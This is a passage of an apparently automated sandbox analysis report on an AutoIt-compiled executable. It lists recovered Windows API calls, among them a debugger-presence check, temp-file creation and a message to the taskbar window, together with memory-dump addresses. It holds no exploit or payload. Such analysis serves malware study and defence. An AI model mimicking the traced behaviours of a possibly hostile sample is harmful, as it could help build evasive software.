                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A310E2,?,?,?,00A1100A), ref: 00A2FAD9
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A310E6
                                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A310F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A310F0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A839F0
                                                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A83A05
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                    • String ID: aut
                                                                                                                                                                                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA2DC8
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AA2DDB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA2E08
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00AA2E0F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A4C213
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A4C221
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A4C27C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                    • String ID: